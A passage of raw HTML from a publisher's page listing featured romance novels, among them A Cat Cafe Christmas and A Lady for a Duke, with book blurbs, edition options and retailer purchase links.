				<a target="_blank" href="http://www.indiebound.org/book/9781538704370"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538704370"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538704370/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538704370"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538704370"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538704370"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781538708156">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/codi-gary/a-cat-cafe-christmas/9781538708156/" alt="A Cat Cafe Christmas">
			<img width="187" height="285" src="" class="lazyload orientation-portrait" alt="A Cat Cafe Christmas" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/9781538708156.jpg?fit=187%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/codi-gary/a-cat-cafe-christmas/9781538708156/" alt="A Cat Cafe Christmas">
							A Cat Cafe Christmas						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/codi-gary/" class="title-header__author"><span>Codi Gary</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><B>A laugh-out-loud, opposites attract romance about three of the world&rsquo;s most beloved C&rsquo;s: Christmas, Coffee, and Cats.</B><BR /><BR /> Veterinarian&#160;and animal lover Kara Ingalls needs a Christmas miracle. Opening the Meow and Furrever Cat Caf&eacute; to find loving homes for adorable, adoptable cats was a dream come true&mdash;but with more cats than customers, it&rsquo;s quickly turning into a nightmare. If Kara can&rsquo;t figure out some way to get the caf&eacute; out of the red, it won&rsquo;t last past the holidays.<BR /><BR /> Marketing guru Ben Reese may be annoyingly smart and frustratingly bossy, but when he hatches a plan to put the caf&eacute; in the &ldquo;green&rdquo; by Christmas, Kara realizes that she&rsquo;d be a fool to turn down his help. And so what if he turns out to be an excellent problem solver and nerdy-hot&mdash;he can&rsquo;t even handle fostering one little kitten. She needs to keep their relationship professional and focus on saving the cafe.<BR /><BR /> But if Ben and Kara can set aside their differences&mdash;and find homes for all the cats by Christmas&mdash;they might discover that, by risking their hearts, they&rsquo;ll have their own <I>purr</I>-fect holiday . . . together.</p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Trade Paperback</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2236142177  desc-arrow-540648399">
	<title id="titlet-arrow-2236142177">Arrow Icon</title>
	<desc id="desc-arrow-540648399">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/codi-gary/a-cat-cafe-christmas/9781538708170/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/codi-gary/a-cat-cafe-christmas/9781668612118/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1951622071  desc-arrow-1971751855">
	<title id="titlet-arrow-1951622071">Arrow Icon</title>
	<desc id="desc-arrow-1971751855">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1538708159?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538708156"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538708156"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781538708156"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538708156"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538708156/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538708156"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538708156"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538708156"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781538707371">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/emily-march/the-getaway/9781538707371/" alt="The Getaway">
			<img width="186" height="285" src="" class="lazyload orientation-portrait" alt="The Getaway" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/09/9781538707371.jpg?fit=186%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/emily-march/the-getaway/9781538707371/" alt="The Getaway">
							The Getaway						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/emily-march/" class="title-header__author"><span>Emily March</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><B>&quot;Feel good fiction [is] at its finest&quot; (Susan Wiggs) in this&#160;<I>New York Times&#160;</I>bestselling author&#039;s new series, where after years of putting her family first, Genevieve Prentice is making a fresh start</B><B>&mdash;but it&rsquo;s never easy to leave the past behind.</B><B>&#160;</B><BR /><BR />Widowed young, Genevieve Prentice dedicated her life to raising her four children. Now, though, they&rsquo;re all grown and scattered to the wind, and Genevieve is ready for a change. In a flash of inspiration, she puts her home on the market and heads to Lake in the Clouds, Colorado, to renovate a rustic waterfront lodge with her sister. But just as they begin, Genevieve gets the shock of a lifetime: the arrival of her son.<BR /><BR />Jake Prentice built a career out of being dependable, one that left him perennially stressed and overworked. Finally heeding his mother&rsquo;s words of wisdom, he&rsquo;s quit his job and is ready to find out what truly makes him happy. And now, as he stands surrounded by open sky and fresh, pine-scented air, he&rsquo;s got no regrets . . . until former colleague Tess Crenshaw appears at the lake, forcing him to reassess what&mdash;and who&mdash;he really wants.<BR /><BR />As they work together to renovate the lodge, Genevieve and Jake embark on a heartfelt and inspiring journey to learn about themselves, each other, and the true meaning of family.</p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Trade Paperback</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1120131169  desc-arrow-1554435474">
	<title id="titlet-arrow-1120131169">Arrow Icon</title>
	<desc id="desc-arrow-1554435474">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/emily-march/the-getaway/9781538707395/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/emily-march/the-getaway/9781668612279/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/emily-march/the-getaway/9781538707388/">
						Mass Market					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-94060907  desc-arrow-1234480983">
	<title id="titlet-arrow-94060907">Arrow Icon</title>
	<desc id="desc-arrow-1234480983">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1538707373?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538707371"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538707371"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781538707371"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538707371"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538707371/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538707371"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538707371"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538707371"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781538737712">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/amalie-howard/always-be-my-duchess/9781538737712/" alt="Always Be My Duchess">
			<img width="187" height="285" src="" class="lazyload orientation-portrait" alt="Always Be My Duchess" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/07/9781538737712.jpg?fit=187%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/amalie-howard/always-be-my-duchess/9781538737712/" alt="Always Be My Duchess">
							Always Be My Duchess						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/amalie-howard/" class="title-header__author"><span>Amalie Howard</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><B><I>Pretty Woman&#160;</I>meets the Bridgertons&#160;in this witty, vivacious historical take on 90s romcoms by&#160;<I>USA Today</I> bestselling author Amalie Howard:&#160;<BR /><BR />&quot;Refreshing, steamy, and stocked with characters you don&rsquo;t normally get to see in the genre&mdash;a&#160;must-read author.&quot;<BR />&mdash;Jodi Picoult, #1&#160;<I>New York Times</I> bestselling author<BR /><BR />&ldquo;Fabulous writing . . . such a delicious escape. Utterly delightful!&rdquo;<BR />&mdash;Eloisa James, <I>New York Times </I>bestselling author<BR /><BR />&ldquo;Amalie Howard tells a story with self-assured style, wit, and energy . . . her writing sparkles!&rdquo;</B> &mdash;<B>Lisa Kleypas,&#160;<I>New York Times&#160;</I>bestselling author</B><BR /><BR />Lord Lysander Blackstone, the stern Duke of Montcroix, has only one interest: increasing his considerable fortune. After a series of betrayals, he keeps his emotions buried deep. Money, after all, can&#039;t break a man&#039;s heart&mdash;or make promises it can&rsquo;t keep. But when his reputation for being heartless jeopardizes a new business deal, he finds himself seeking a most unusual&mdash;and alluring&mdash;solution . . .&#160;<BR /><BR />Once an up-and-coming ballerina, Miss Genevi&egrave;ve Valery is now hopelessly out of work. After refusing to become a wealthy patron&#039;s mistress, N&egrave;ve was promptly shown the door to the streets. When she accidentally saves the life of a handsome duke, she doubts the encounter will go any better than her last brush with nobility. But instead of propositioning her, Montcroix makes&#160;N&egrave;ve an offer she would be a fool to refuse: act as his fake fianc&eacute;e in exchange for fortune enough to start over.<BR /><BR />Only neither is prepared when very&#160;<I>real&#160;</I>feelings begin to grow between them. They both stand to win . . . but only if they&rsquo;re willing to risk their hearts.</p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Trade Paperback</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-601860636  desc-arrow-1925633003">
	<title id="titlet-arrow-601860636">Arrow Icon</title>
	<desc id="desc-arrow-1925633003">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/amalie-howard/always-be-my-duchess/9781538737705/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/amalie-howard/always-be-my-duchess/9781549166174/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/amalie-howard/always-be-my-duchess/9781538737729/">
						Mass Market					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3645410071  desc-arrow-1114487201">
	<title id="titlet-arrow-3645410071">Arrow Icon</title>
	<desc id="desc-arrow-1114487201">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/153873771X?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538737712"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538737712"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781538737712"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538737712"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538737712/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538737712"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538737712"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538737712"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>

<p>&nbsp;</p>

<div class="featured-title v2" id="title-9781538753750">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/alexis-hall/a-lady-for-a-duke/9781538753750/" alt="A Lady for a Duke">
			<img width="187" height="285" src="" class="lazyload orientation-portrait" alt="A Lady for a Duke" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/05/9781538753750.jpg?fit=187%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/alexis-hall/a-lady-for-a-duke/9781538753750/" alt="A Lady for a Duke">
							A Lady for a Duke						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/alexis-hall/" class="title-header__author"><span>Alexis Hall</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><B>A lush, sweeping queer historical romance from the <I>USA Today&#160;</I>bestselling author of <I>Husband Material</I>&mdash;perfect for fans of Netflix&rsquo;s <I>Bridgerton</I>, Evie Dunmore, and Lisa Kleypas!</B><DIV><DIV><BR /> When Viola Carroll was presumed dead at Waterloo she took the opportunity to live, at last, as herself. But freedom does not come without a price, and Viola paid for hers with the loss of her wealth, her title, and her closest companion, Justin de Vere, the Duke of Gracewood.<BR /><BR /> Only when their families reconnect, years after the war, does Viola learn how deep that loss truly was. Shattered without her, Gracewood has retreated so far into grief that Viola barely recognises her old friend in the lonely, brooding man he has become.<BR /><BR /> As Viola strives to bring Gracewood back to himself, fresh desires give new names to old feelings. Feelings that would have been impossible once and may be impossible still, but which Viola cannot deny. Even if they cost her everything, all over again. </DIV></DIV></p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Trade Paperback</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1929157591  desc-arrow-730670702">
	<title id="titlet-arrow-1929157591">Arrow Icon</title>
	<desc id="desc-arrow-730670702">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/alexis-hall/a-lady-for-a-duke/9781538753743/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/alexis-hall/a-lady-for-a-duke/9781549109621/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/alexis-hall/a-lady-for-a-duke/9781538753767/">
						Mass Market					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-145313720  desc-arrow-823067862">
	<title id="titlet-arrow-145313720">Arrow Icon</title>
	<desc id="desc-arrow-823067862">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1538753758?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538753750"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538753750"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781538753750"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538753750"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538753750/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538753750"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538753750"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538753750"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781538706534">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/helena-greer/season-of-love/9781538706534/" alt="Season of Love">
			<img width="187" height="285" src="" class="lazyload orientation-portrait" alt="Season of Love" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/9781538706534.jpg?fit=187%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/helena-greer/season-of-love/9781538706534/" alt="Season of Love">
							Season of Love						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/helena-greer/" class="title-header__author"><span>Helena Greer</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><B>Buzzfeed&rsquo;s Most Anticipated LGBTQ Romances of 2022</B><BR /> &#160;<BR /><B>Miriam Blum has no choice but to face the past she thought she&rsquo;d left behind when she inherits her great-aunt&rsquo;s Christmas tree farm in this witty, glittering, heart-filled romcom with &ldquo;all of the warm, queer, Jewish holiday vibes you could possibly want&rdquo; (Jen DeLuca, <I>USA Today </I>bestselling author of <I>Well Matched</I>) </B><BR /> &#160;<BR /><B>&ldquo;A warm, cozy holiday romance . . . a vibrant exploration of embracing that which is most unexpected in life . . . and in love. Best read under the glow of rainbow twinkle lights with a cup of cocoa.&rdquo;</B><BR /><B>&mdash;Ashley Herring Blake, author of <I>Delilah Green Doesn&rsquo;t Care</I></B><BR /><BR /> Thanks to her thriving art career, Miriam Blum finally has her decoupaged glitter ducks in a row&mdash;until devastating news forces her to a very unwanted family reunion. Her beloved great-aunt Cass has passed and left Miriam part-owner of Carrigan&rsquo;s, her (ironically) Jewish-run Christmas tree farm.<BR /> &#160;<BR /> But Miriam&rsquo;s plans to sit shiva, avoid her parents, then put Carrigan&rsquo;s in her rearview mirror are spoiled when she learns the business is at risk of going under. To have any chance at turning things around, she&rsquo;ll need to work with the farm&rsquo;s grumpy manager&mdash;as long as the attraction sparking between them doesn&rsquo;t set all their trees on fire first.<BR /> &#160;<BR /> Noelle Northwood wants Miriam Blum <I>gone</I>&mdash;even if her ingenious ideas and sensitive soul keep showing Noelle there&rsquo;s more to Cass&rsquo;s niece than meets the eye. But saving Carrigan&rsquo;s requires trust, love, and risking it all&mdash;for the chance to make their wildest dreams come true.</p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Trade Paperback</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3296897108  desc-arrow-3170062956">
	<title id="titlet-arrow-3296897108">Arrow Icon</title>
	<desc id="desc-arrow-3170062956">Arrow icon</desc>
